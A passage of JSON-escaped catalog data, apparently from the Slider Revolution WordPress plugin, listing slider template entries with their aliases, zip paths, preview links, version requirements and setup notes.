Hero\",\"alias\":\"dark-fullsite-block-1\",\"zip\":\"packs\\/dark-fullsite-block-1.zip\",\"uid\":\"d8859245fe600288ca932dc29aca751f\",\"img\":\"dark-fullsite-block-1\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/dark-wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=dark-wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite Dark\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"2\",\"installed\":false},\"69\":{\"id\":\"71\",\"title\":\"Dark Content Block - About\",\"alias\":\"dark-fullsite-block-2-about\",\"zip\":\"packs\\/dark-fullsite-block-2-about.zip\",\"uid\":\"298401901521a197a8294c1b4f73df3e\",\"img\":\"dark-fullsite-block-2-about\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/dark-wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=dark-wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite Dark\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"2\",\"installed\":false},\"70\":{\"id\":\"72\",\"title\":\"Dark Content Block - Services\",\"alias\":\"dark-fullsite-block-3-services\",\"zip\":\"packs\\/dark-fullsite-block-3-services.zip\",\"uid\":\"8da3ed605472ed6a26c745fb52f85f82\",\"img\":\"dark-fullsite-block-3-services\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/dark-wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=dark-wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite Dark\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"2\",\"installed\":false},\"71\":{\"id\":\"73\",\"title\":\"Dark Content Block - Products\",\"alias\":\"dark-fullsite-block-4-products\",\"zip\":\"packs\\/dark-fullsite-block-4-products.zip\",\"uid\":\"99e4f40399d20261a6131043d0e50b0c\",\"img\":\"dark-fullsite-block-4-products\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/dark-wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=dark-wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\\r\\n\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite Dark\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"2\",\"installed\":false},\"72\":{\"id\":\"74\",\"title\":\"Dark Content Block - Testimonials\",\"alias\":\"dark-fullsite-block-5-testimonials\",\"zip\":\"packs\\/dark-fullsite-block-5-testimonials.zip\",\"uid\":\"2f9121e0eedd51afe85e233d0743acab\",\"img\":\"dark-fullsite-block-5-testimonials\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/dark-wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=dark-wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite Dark\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"2\",\"installed\":false},\"73\":{\"id\":\"75\",\"title\":\"Dark Content Block - Callout\",\"alias\":\"dark-fullsite-block-6-callout\",\"zip\":\"packs\\/dark-fullsite-block-6-callout.zip\",\"uid\":\"55fbecb113ff21f050be7adc08637329\",\"img\":\"dark-fullsite-block-6-callout\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/dark-wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=dark-wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite Dark\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"2\",\"installed\":false},\"74\":{\"id\":\"76\",\"title\":\"Dark Content Block - Footer\",\"alias\":\"dark-fullsite-block-7-footer\",\"zip\":\"packs\\/dark-fullsite-block-7-footer.zip\",\"uid\":\"2ff517f5c7c54e3e0c2dd733cfd3400e\",\"img\":\"dark-fullsite-block-7-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/dark-wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=dark-wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite Dark\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"2\",\"installed\":false},\"75\":{\"id\":\"77\",\"title\":\"Light Content Block - Menu\",\"alias\":\"fullsite-block-menu\",\"zip\":\"packs\\/fullsite-block-menu.zip\",\"uid\":\"8010971f34387d5f94a1f4e577ef382a\",\"img\":\"fullsite-block-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"1\",\"installed\":false},\"76\":{\"id\":\"78\",\"title\":\"Light Content Block - Hero\",\"alias\":\"fullsite-block1\",\"zip\":\"packs\\/fullsite-block1.zip\",\"uid\":\"45bf7179843e01ce112e8ec754b0455c\",\"img\":\"fullsite-block1\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"1\",\"installed\":false},\"77\":{\"id\":\"79\",\"title\":\"Light Content Block - About\",\"alias\":\"fullsite-block-2-about\",\"zip\":\"packs\\/fullsite-block-2-about.zip\",\"uid\":\"8402b460638a746d36433cb161440b7d\",\"img\":\"fullsite-block-2-about\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"1\",\"installed\":false},\"78\":{\"id\":\"80\",\"title\":\"Light Content Block - Services\",\"alias\":\"fullsite-block-3-services\",\"zip\":\"packs\\/fullsite-block-3-services.zip\",\"uid\":\"7b8cea27f4d6ae17c5e1eae12457bd06\",\"img\":\"fullsite-block-3-services\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"1\",\"installed\":false},\"79\":{\"id\":\"81\",\"title\":\"Light Content Block - Products\",\"alias\":\"fullsite-block-4-products\",\"zip\":\"packs\\/fullsite-block-4-products.zip\",\"uid\":\"d148935362d7122636cda0635eae4be7\",\"img\":\"fullsite-block-4-products\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"1\",\"installed\":false},\"80\":{\"id\":\"82\",\"title\":\"Light Content Block - Testimonials\",\"alias\":\"fullsite-block-5-testimonials\",\"zip\":\"packs\\/fullsite-block-5-testimonials.zip\",\"uid\":\"06255bfd421e40f71fa8197b839dbf03\",\"img\":\"fullsite-block-5-testimonials\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"1\",\"installed\":false},\"81\":{\"id\":\"83\",\"title\":\"Light Content Block - Callout\",\"alias\":\"fullsite-block-6-callout\",\"zip\":\"packs\\/fullsite-block-6-callout.zip\",\"uid\":\"8a88c3447676b613ec5db2fe5d63315c\",\"img\":\"fullsite-block-6-callout\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"1\",\"installed\":false},\"82\":{\"id\":\"84\",\"title\":\"Light Content Block - Footer\",\"alias\":\"fullsite-block-7-footer\",\"zip\":\"packs\\/fullsite-block-7-footer.zip\",\"uid\":\"34300b4407a2093eb2e1e08868fa8319\",\"img\":\"fullsite-block-7-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"1\",\"installed\":false},\"83\":{\"id\":\"85\",\"title\":\"Tech Journal\",\"alias\":\"techjournal\",\"zip\":\"techjournal.zip\",\"uid\":\"7f92d70d1c108378f915b18c2ceb71d6\",\"img\":\"techjournal\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5.1\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">A full-width slider with navigation direction-based transitions.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"84\":{\"id\":\"86\",\"title\":\"Car Dealership\",\"alias\":\"cardealership\",\"zip\":\"cardealership.zip\",\"uid\":\"bb010838855a8ae4d1dd68e139bf169e\",\"img\":\"cardealership\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/car-dealership-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=car-dealership-slider\",\"version\":\"1.0.0\",\"required\":\"5.2.5.1\",\"width\":\"1240\",\"height\":\"650\",\"description\":\"<span class=\\\"ttm_content\\\">A full-width slider with navigation direction-based transitions.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"85\":{\"id\":\"87\",\"title\":\"FullScreen Menu Slider\",\"alias\":\"fullscreenmenu\",\"zip\":\"fullscreenmenu.zip\",\"uid\":\"6de81d74c4bf193e2e274d43038adc85\",\"img\":\"fullscreenmenu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-fullscreen-menu\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-fullscreen-menu\",\"version\":\"1.0.1\",\"required\":\"5.2.5.3\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A full-screen slider that contains a menu with slide blur effect.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"86\":{\"id\":\"88\",\"title\":\"Creative Frontpage\",\"alias\":\"creativefrontpage\",\"zip\":\"creativefrontpage.zip\",\"uid\":\"0636cb368af3bcaa2f68eb0ebefe6439\",\"img\":\"creativefrontpage\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/best-wordpress-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=best-wordpress-slider\",\"version\":\"1.0.0\",\"required\":\"5.2.5.3\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A full-screen slider with hidden slides that are triggered via  <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\" target=\\\"_blank\\\">\\\"Layer Actions\\\"<\\/a>.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"87\":{\"id\":\"97\",\"title\":\"Focus Parallax 